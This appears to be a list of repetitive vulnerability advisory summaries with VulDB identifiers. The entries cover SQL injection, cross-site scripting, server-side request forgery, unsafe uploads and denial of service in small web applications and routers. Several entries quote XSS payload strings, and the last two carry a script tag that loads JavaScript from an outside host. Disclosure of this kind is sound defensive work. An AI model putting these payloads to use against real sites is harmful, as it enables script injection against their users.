A vulnerability was found in Inis up to 2.0.1. It has been rated as critical. This issue affects some unknown processing of the file app/api/controller/default/Proxy.php. The manipulation of the argument p_url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249875.
A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login_process.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249874 is the identifier assigned to this vulnerability.
A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file /admin/admin_login_process.php. The manipulation of the argument admin_password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249873 was assigned to this vulnerability.
A vulnerability was found in Guangzhou Yingke Electronic Technology Ncast up to 2017 and classified as problematic. Affected by this issue is some unknown functionality of the file /manage/IPSetup.php of the component Guest Login. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249872.
A vulnerability has been found in Youke365 up to 1.5.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /app/api/controller/collect.php. The manipulation of the argument url leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249871.
A vulnerability, which was classified as critical, was found in Youke365 up to 1.5.3. Affected is an unknown function of the file /app/api/controller/caiji.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249870 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in fhs-opensource iparking 1.5.22.RELEASE. This issue affects some unknown processing of the file /vueLogin. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249869 was assigned to this vulnerability.
A vulnerability was found in Byzoro Smart S150 Management Platform up to 20240101. It has been rated as critical. Affected by this issue is some unknown functionality of the file /useratte/userattestation.php of the component HTTP POST Request Handler. The manipulation of the argument web_img leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249866 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Kashipara Food Management System 1.0. This issue affects some unknown processing of the file stock_edit.php. The manipulation of the argument item_type leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249851.
A vulnerability classified as critical was found in Kashipara Food Management System 1.0. This vulnerability affects unknown code of the file stock_entry_submit.php. The manipulation of the argument itemype leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249850 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Kashipara Food Management System 1.0. This affects an unknown part of the file rawstock_used_damaged_submit.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249849 was assigned to this vulnerability.
A vulnerability was found in Kashipara Food Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file itemBillPdf.php. The manipulation of the argument printid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249848.
A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file index.php#contact_us of the component Contact Form. The manipulation of the argument Name/Email/Message leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249843.
A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as problematic. This issue affects some unknown processing of the file party_submit.php. The manipulation of the argument party_address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249839.
A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file party_details.php. The manipulation of the argument party_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249838 is the identifier assigned to this vulnerability.
A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as problematic. This affects an unknown part of the file addmaterialsubmit.php. The manipulation of the argument tin leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249837 was assigned to this vulnerability.
A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file loginCheck.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249836.
A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file item_type_submit.php. The manipulation of the argument type_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249835.
A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. Affected is an unknown function of the file item_list_edit.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249834 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Kashipara Food Management System up to 1.0. This issue affects some unknown processing of the file partylist_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249833 was assigned to this vulnerability.
A vulnerability classified as critical was found in Kashipara Food Management System up to 1.0. This vulnerability affects unknown code of the file party_submit.php. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249832.
A vulnerability classified as critical has been found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file rawstock_used_damaged_smt.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249831.
A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file item_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249830 is the identifier assigned to this vulnerability.
A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file billAjax.php. The manipulation of the argument item_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249829 was assigned to this vulnerability.
A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as critical. Affected is an unknown function of the file addwaste_entry.php. The manipulation of the argument item_name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249828.
A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file addmaterialsubmit.php. The manipulation of the argument material_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249827.
A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file addmaterial_edit.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249826 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file item_list_submit.php. The manipulation of the argument item_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249825 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Kashipara Hospital Management System up to 1.0. Affected by this issue is some unknown functionality of the file registration.php. The manipulation of the argument name/email/pass/gender/age/city leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249824.
A vulnerability classified as critical was found in Kashipara Hospital Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Parameter Handler. The manipulation of the argument email/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249823.
A vulnerability classified as problematic has been found in Project Worlds Online Lawyer Management System 1.0. Affected is an unknown function of the component User Registration. The manipulation of the argument First Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249822 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component GET Parameter Handler. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249821 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /LoginRegistration.php. The manipulation of the argument formToken leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249820.
A vulnerability was found in ACME Ultra Mini HTTPd 1.21. It has been classified as problematic. This affects an unknown part of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249819.
A vulnerability was found in Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Admin/News.php of the component Create News Page. The manipulation of the argument News with the input &lt;/title&gt;&lt;scRipt&gt;alert(0x00C57D)&lt;/scRipt&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249818 is the identifier assigned to this vulnerability.
A vulnerability has been found in Sentex FTPDMIN 0.96 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component RNFR Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249817 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file change_password_teacher.php of the component Password Change. The manipulation leads to session expiration. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249816.
A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27"()%26%25&lt;zzz&gt;&lt;ScRiPt&gt;alert(document.domain)&lt;/ScRiPt&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Magic-Api up to 2.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resource/file/api/save?auto=1. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249511.
A vulnerability, which was classified as critical, has been found in CodeAstro Internet Banking System up to 1.0. This issue affects some unknown processing of the file pages_account.php of the component Profile Picture Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249509 was assigned to this vulnerability.
A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file downloadable.php of the component Add Downloadable. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249505 was assigned to this vulnerability.
A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/uploads/. The manipulation leads to file and directory information exposure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249504.
A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file add_quiz.php of the component Quiz Handler. The manipulation of the argument Quiz Title/Quiz Description with the input &lt;/title&gt;&lt;scRipt&gt;alert(x)&lt;/scRipt&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249503.
A vulnerability has been found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file teacher_message.php of the component Create Message Handler. The manipulation of the argument Content with the input &lt;/title&gt;&lt;scRipt&gt;alert(x)&lt;/scRipt&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249502 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in RRJ Nueva Ecija Engineer Online Portal 1.0. This affects an unknown part of the file change_password_teacher.php. The manipulation leads to weak password requirements. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-249501 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in HuiRan Host Reseller System up to 2.0.0. Affected is an unknown function of the file /user/index/findpass?do=4 of the component HTTP POST Request Handler. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249444.
A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file dasboard_teacher.php of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249443.
A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/edit_teacher.php of the component Add Enginer. The manipulation of the argument Firstname/Lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249442 is the identifier assigned to this vulnerability.
A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/students.php of the component NIA Office. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249441 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-249440.
A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin_user.php of the component Admin Panel. The manipulation of the argument Firstname/Lastname/Username leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249433 was assigned to this vulnerability.
A vulnerability has been found in Secure Systems Engineering Connaisseur up to 3.3.0 and classified as problematic. This vulnerability affects unknown code of the file connaisseur/res/targets_schema.json of the component Delegation Name Handler. The manipulation leads to inefficient regular expression complexity. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 524b73ff7306707f6d3a4d1e86401479bca91b02. It is recommended to upgrade the affected component.
** DISPUTED ** A vulnerability was found in zzdevelop lenosp up to 20230831. It has been classified as problematic. This affects an unknown part of the component Adduser Page. The manipulation of the argument username with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The associated identifier of this vulnerability is VDB-266127. NOTE: The vendor rejected the issue because he claims that XSS which require administrative privileges are not of any use for attackers.
A vulnerability was found in meetyoucrop big-whale 1.1 and classified as critical. Affected by this issue is some unknown functionality of the file /auth/user/all.api of the component Admin Module. The manipulation of the argument id leads to improper ownership management. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250232.
A vulnerability classified as problematic has been found in Totolink T6 4.1.9cu.5241_B20210923. This affects an unknown part of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument topicurl with the input showSyslog leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249867. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Chanzhaoyu chatgpt-web 2.11.1. This issue affects some unknown processing. The manipulation of the argument Description with the input &lt;image src onerror=prompt(document.domain)&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249779.
A vulnerability classified as critical has been found in DeDeCMS up to 5.7.112. Affected is an unknown function of the file file_class.php of the component Backend. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249768. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Uniway Router 2.0. It has been declared as critical. This vulnerability affects unknown code of the component Administrative Web Interface. The manipulation leads to reliance on ip address for authentication. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-249766 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in OneNav up to 0.9.33. It has been classified as critical. This affects an unknown part of the file /index.php?c=api of the component API. The manipulation of the argument X-Token leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249765 was assigned to this vulnerability.
A vulnerability was found in Uniway Router up to 2.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /boaform/device_reset.cgi of the component Device Reset Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249758 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MTab Bookmark up to 1.2.6 and classified as critical. This issue affects some unknown processing of the file public/install.php of the component Installation. The manipulation leads to improper access controls. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249395. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in S-CMS up to 2.0_build20220529-20231006. This affects an unknown part of the file member/reg.php. The manipulation of the argument M_login/M_email leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249393 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in S-CMS up to 2.0_build20220529-20231006. Affected by this issue is some unknown functionality of the file /member/ad.php?action=ad. The manipulation of the argument A_text/A_url/A_contact leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249392. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in S-CMS up to 2.0_build20220529-20231006. Affected by this vulnerability is an unknown functionality of the file /s/index.php?action=statistics. The manipulation of the argument lid leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249391. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Shipping 100 Fahuo100 up to 1.1. Affected is an unknown function of the file member/login.php. The manipulation of the argument M_pwd leads to sql injection. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-249390 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Totolink N350RT 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects some unknown processing of the file /cgi-bin/cstecgi.cgi?action=login&amp;flag=ie8 of the component HTTP POST Request Handler. The manipulation leads to stack-based buffer overflow. The exploit has been disclosed to the public and may be used. The identifier VDB-249389 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been declared as critical. This vulnerability affects unknown code of the file member/notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249388. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been classified as critical. This affects an unknown part of the file shop/wxpay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249387. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this issue is some unknown functionality of the file shop/notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249386 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this vulnerability is an unknown functionality of the file shop/alipay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249385 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Muyun DedeBIZ up to 6.2.12 and classified as critical. Affected by this issue is some unknown functionality of the component Add Attachment Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249368. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/project/proj/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249367. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Campcodes Online College Library System 1.0. Affected is an unknown function of the file /admin/category_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249366 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Online College Library System 1.0. This issue affects some unknown processing of the file /admin/book_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249365 was assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Online College Library System 1.0. This vulnerability affects unknown code of the file /admin/book_add.php of the component HTTP POST Request Handler. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249364.
A vulnerability classified as critical has been found in Campcodes Online College Library System 1.0. This affects an unknown part of the file /admin/return_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249363.
A vulnerability was found in Campcodes Online College Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/borrow_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249362 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356.
A vulnerability was found in Novel-Plus up to 4.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java of the component Friendly Link Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6093d8182362422370d7eaf6c53afde9ee45215. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249307.
A vulnerability classified as problematic has been found in Novel-Plus up to 4.2.0. This affects an unknown part of the file /user/updateUserInfo of the component HTTP POST Request Handler. The manipulation of the argument nickName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c62da9bb3a9b3603014d0edb436146512631100d. It is recommended to apply a patch to fix this issue. The identifier VDB-249201 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file index.php?para=index of the component Login. The manipulation of the argument check_VirtualSiteId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249183.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Add Engineer Handler. The manipulation of the argument first name/last name with the input &lt;script&gt;alert(0)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249182 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /app/ajax/sell_return_data.php. The manipulation of the argument columns[0][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249179.
A vulnerability has been found in Campcodes Online College Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file index.php of the component Search. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249178 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Free and Open Source Inventory Management System 1.0. This affects an unknown part of the file /ample/app/action/edit_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249177 was assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Chic Beauty Salon 20230703. Affected by this vulnerability is an unknown functionality of the file product-list.php of the component Product Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249157 was assigned to this vulnerability.
A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input "&gt;&lt;iMg src=N onerror=alert(document.domain)&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability.
A vulnerability has been found in ShifuML shifu 0.12.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file src/main/java/ml/shifu/shifu/core/DataPurifier.java of the component Java Expression Language Handler. The manipulation of the argument FilterExpression leads to code injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249151.
A vulnerability was found in code-projects Client Details System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/regester.php. The manipulation of the argument fname/lname/email/contact leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249146 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Client Details System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/clientview.php. The manipulation of the argument ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249145 was assigned to this vulnerability.
A vulnerability was found in code-projects Client Details System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/update-clients.php. The manipulation of the argument uid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249144.
A vulnerability was found in code-projects Client Details System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/manage-users.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249143.
A vulnerability has been found in code-projects Client Details System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/regester.php of the component HTTP POST Request Handler. The manipulation of the argument fname/lname/email/contact leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249142 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in code-projects Client Details System 1.0. This affects an unknown part of the file /admin of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249141 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the component HTTP POST Request Handler. The manipulation of the argument uemail leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249140.
A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "&gt;&lt;script src="https://js.rip/b23tmbxf49"&gt;&lt;/script&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139.
A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "&gt;&lt;script src="https://js.rip/b23tmbxf49"&gt;&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability.
